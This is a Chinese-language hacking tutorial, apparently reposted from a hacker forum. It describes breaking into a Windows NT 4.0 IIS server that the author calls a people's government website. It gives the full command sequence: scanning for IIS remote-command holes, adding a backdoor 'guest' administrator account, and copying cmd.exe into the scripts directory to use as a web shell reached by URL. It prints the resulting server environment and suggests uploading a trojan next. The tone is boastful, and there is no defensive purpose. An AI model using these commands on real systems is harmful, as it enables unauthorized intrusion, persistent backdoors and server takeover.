网络通信 频道

一次巧妙的nt入侵

照常启动流光4.5破解版,按ctrl+r,选择winnt/98,然后随便填上一个IP段,本人填的就是某一人民政府的IP,确定后扫描过一会,出现了战果了:
其中人民政府网站的漏洞是可以执行iis远程命令和可以下载sam。
都很常见的漏洞,如果仔细点扫描一定还有其它的漏洞。
这里就用执行iis远程命令吧。sam的还要破解,太麻烦。
先连上去,输入ver
显示winnt 4.0的
先留个后门:
net user guest /activer:y
net user guest xhacker /add
net localgroup administrators guest /add
留好了,这样可以方便地拷贝程序上去了。停!
对于很多人来说,怎么通过net启动程序是个大问题!所以本人就为了菜菜们独创一招:转向unicode攻击法!
unicode是最受欢迎的漏洞,教程也最多,在这就不写多少了。可是人民政府网站根本没有这个漏洞啊,没关系,告诉你无敌的一招!
再输入关键一句(cmd.exe的位置自己dir了):
copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\xhacker.exe (大家不要学我把cmd.exe改的这么嚣张)
copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\xhacker.exe
1 file(s) copied.
好了,结束输入
exit现在可以转到IE上输入这么一句,太熟悉了,现在变成unicode攻击法了!
http://202.x.118.166/scripts/xhacker.exe?/c+set
CGI 错误
指定的 CGI 应用程序因为没有返回完整的 HTTP 标题而运行不正常。它返回的标题是:
COMPUTERNAME=SERVER
ComSpec=C:\WINNT\system32\cmd.exe (呵呵,cmd.exe的路径)
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=202.102.118.166
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INCLUDE=C:\Program Files\Mts\Include
INSTANCE_ID=1
LIB=C:\Program Files\Mts\Lib
LOCAL_ADDR=202.x.118.166 (我的IP,不好啊)
NUMBER_OF_PROCESSORS=2
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT (看到了吗?)
Path=C:\WINNT\system32;C:\WINNT;C:\Program Files\Mts
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=C:\InetPub\wwwroot (主页目录,重要哦!)
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 5 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0503
PROMPT=$P$G
QUERY_STRING=/c+set (刚才使用的命令!别忘本哦)
REMOTE_ADDR=61.
哈哈,现在就用你熟悉的方法搞定它吧。
当然还可以用net命令copy上一个木马程序,然后用unicode启动!
此文只是提出了其它的思路。比如ida/idq攻击也可以转为unicode攻击。
其实还有些比较好的技巧在里面,自己去思考吧。88
如要转载请注明出处http://xhacker.xilubbs.com>http://xhacker.xilubbs.com

文章转载地址:http://www.cnpaf.net/Class/hack/05121820345081450274.htm

0
相关文章